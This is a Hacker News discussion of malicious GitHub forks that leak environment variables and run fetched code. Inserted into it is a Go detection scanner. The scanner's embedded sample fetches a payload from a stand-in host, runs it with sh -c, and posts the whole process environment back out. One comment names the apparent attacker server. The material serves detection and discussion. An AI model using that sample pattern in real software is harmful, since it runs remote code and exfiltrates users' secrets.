from Hacker News

Malicious code added to 35k GitHub repos, leaking user environments

by pcmonk on 8/3/22, 5:16 AM with 76 comments

  • by oefrha on 8/3/22, 7:27 AM

    What a garbage clickbait thread. From scary words like "attack", "infected", etc. you would think projects are compromised. But nothing is compromised. From wayyyyy down in the thread:

    > The attacker creates FAKE orgs/repos and pushes clones of LEGIT projects to github.

    Yeah, anyone can push anything to their own GitHub accounts/orgs, including malware. We know that.

    Save yourself some time. Flagged.

  • by raggi on 8/3/22, 6:18 AM

    This code does more than leak environments. The go code pulls down arbitrary text and passes it to sh -c, example: https://github.com/zerops-io/zcli/commit/0396ee57bc0e5e0b123...

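The comment above describes Go code that fetches arbitrary text and hands it to sh -c, alongside the environment leak the headline is about. What follows is an added example, not code from the thread, from the linked zcli commit or from any of the repositories involved: a small go/ast scanner that parses one Go file and flags the three building blocks of that pattern (a shell spawned with `sh -c` on a non-literal string, outbound net/http calls, and a read of the whole process environment via os.Environ). The embedded sampleSource is a constructed snippet written to exhibit that shape, and attacker.example is a placeholder host; neither is taken from the malicious forks.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
)

// Finding is one suspicious call site located in a Go source file.
type Finding struct {
	Line   int
	Reason string
}

// sampleSource is a constructed example input (not code from the thread):
// fetch text over HTTP, pass it to `sh -c`, and POST os.Environ() off-host.
const sampleSource = `package main

import (
	"io"
	"net/http"
	"os"
	"os/exec"
	"strings"
)

func main() {
	resp, _ := http.Get("http://attacker.example/payload")
	body, _ := io.ReadAll(resp.Body)
	exec.Command("sh", "-c", string(body)).Run()
	http.Post("http://attacker.example/collect", "text/plain",
		strings.NewReader(strings.Join(os.Environ(), "\n")))
}
`

// callName returns "pkg.Func" for a call written as pkg.Func(...),
// or "" when the callee is not a plain package selector.
func callName(call *ast.CallExpr) string {
	sel, ok := call.Fun.(*ast.SelectorExpr)
	if !ok {
		return ""
	}
	pkg, ok := sel.X.(*ast.Ident)
	if !ok {
		return ""
	}
	return pkg.Name + "." + sel.Sel.Name
}

// isStringLit reports whether e is the interpreted string literal "want".
func isStringLit(e ast.Expr, want string) bool {
	lit, ok := e.(*ast.BasicLit)
	return ok && lit.Kind == token.STRING && lit.Value == `"`+want+`"`
}

// ScanSource parses src and returns one Finding per matching call, in
// source order. A literal third argument to sh -c is not flagged: the
// interesting case is a command string assembled at run time.
func ScanSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	var findings []Finding
	ast.Inspect(f, func(n ast.Node) bool {
		call, ok := n.(*ast.CallExpr)
		if !ok {
			return true
		}
		line := fset.Position(call.Pos()).Line
		switch name := callName(call); name {
		case "exec.Command", "exec.CommandContext":
			args := call.Args
			if name == "exec.CommandContext" && len(args) > 0 {
				args = args[1:] // drop the context argument
			}
			if len(args) >= 3 && isStringLit(args[0], "sh") && isStringLit(args[1], "-c") {
				if _, literal := args[2].(*ast.BasicLit); !literal {
					findings = append(findings, Finding{Line: line, Reason: "sh -c invoked with a non-literal command string"})
				}
			}
		case "http.Get", "http.Post", "http.PostForm":
			findings = append(findings, Finding{Line: line, Reason: "outbound HTTP request via " + name})
		case "os.Environ":
			findings = append(findings, Finding{Line: line, Reason: "entire process environment read"})
		}
		return true
	})
	return findings, nil
}

func main() {
	findings, err := ScanSource("sample.go", sampleSource)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	for _, f := range findings {
		fmt.Printf("sample.go:%d: %s\n", f.Line, f.Reason)
	}
}
```

Run against a checkout with `parser.ParseFile` over each `.go` file; the heuristic is deliberately syntactic, so a hit is a prompt for review rather than proof of malice, but a file that combines all three reasons within a few lines is exactly the shape the comment above describes.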
  • by soruly on 8/3/22, 6:21 AM

    Note that it's 35,613 code results, not 35k repos

    and 13K of the search results come from this org

    https://github.com/redhat-operator-ecosystem

  • by abctree on 8/3/22, 7:50 AM

    This is a consequence of centralization. The canonical project sites and repositories should not be on GitHub.

    Fanatics who believe otherwise will still clone those projects so that they are on sacred ground, but the practice should be frowned upon and fought against.

    Another detrimental effect of GitHub is that they have trained users to accept public "forks" (a misnomer) as the usual way to contribute even trivial patches. This lowers the bar for accepting and trusting non-official repositories.

    GitHub has devalued the brand of large projects and has introduced the age of industrialized software development by creating an addictive environment where software politicians thrive by manipulating their social networks and working on their personal brand.

  • by drekipus on 8/3/22, 5:50 AM

    This is that thing where people can put anyone in as the commit author, thus impersonating the original creator right?

    Seems like the solution is "don't just copy random github urls into your code" ?

  • by mcraiha on 8/3/22, 5:38 AM

    They have attacks for different programming languages and environments. So not just a single target (e.g. npm) attack.

  • by rollulus on 8/3/22, 7:35 AM

    While browsing the nanobox repo linked in the twitter thread I started to get 404s, so it looks like GitHub is on it. Edit: other repos have vanished as well now.

  • by jwilk on 8/3/22, 6:10 AM

    > So far found in projects including: crypto, golang, python, js, bash, docker, k8s

    Huh? What does that mean?

  • by muppetman on 8/3/22, 5:40 AM

    How would code like this make it into so many repos? People accepting pull requests and not properly reviewing them? Or is there something even worse about this attack?

  • by 3np on 8/3/22, 6:20 AM

    TL;DR: These are forks by unknown people containing malware. I see no indication in the linked thread of even a single successful compromise actually occurring, or malicious code making it into legitimate upstream projects.

  • by dustinmoris on 8/3/22, 8:01 AM

    Do we need verified orgs on GitHub now?

  • by thih9 on 8/3/22, 7:55 AM

    > Correction, 35k+ "code hits" on github, not infected repositories.

    Source: https://mobile.twitter.com/stephenlacy/status/15547180866572...

  • by bonzini on 8/3/22, 6:10 AM

    Somebody should DDoS ovz1.j19544519.pr46m.vps.myjino.ru... (mostly kidding)

  • by robertwt7 on 8/3/22, 7:01 AM

    How is this affecting people if the clone does not open PRs to the original one?

    So this will send data to the hacker's network if we clone and build the wrong repo, right?

  • by rvz on 8/3/22, 5:50 AM

    Oh dear. This is a gigantic disaster.

    If lots of software released today hasn't been pinning its versions on release (especially Electron apps) or signing its commits if it is open-source, then this is a chaotic supply chain attack waiting to happen and is worse than I thought.

    But really it is yet, another reason to avoid GitHub entirely and just self-host using GitLab or Gitea.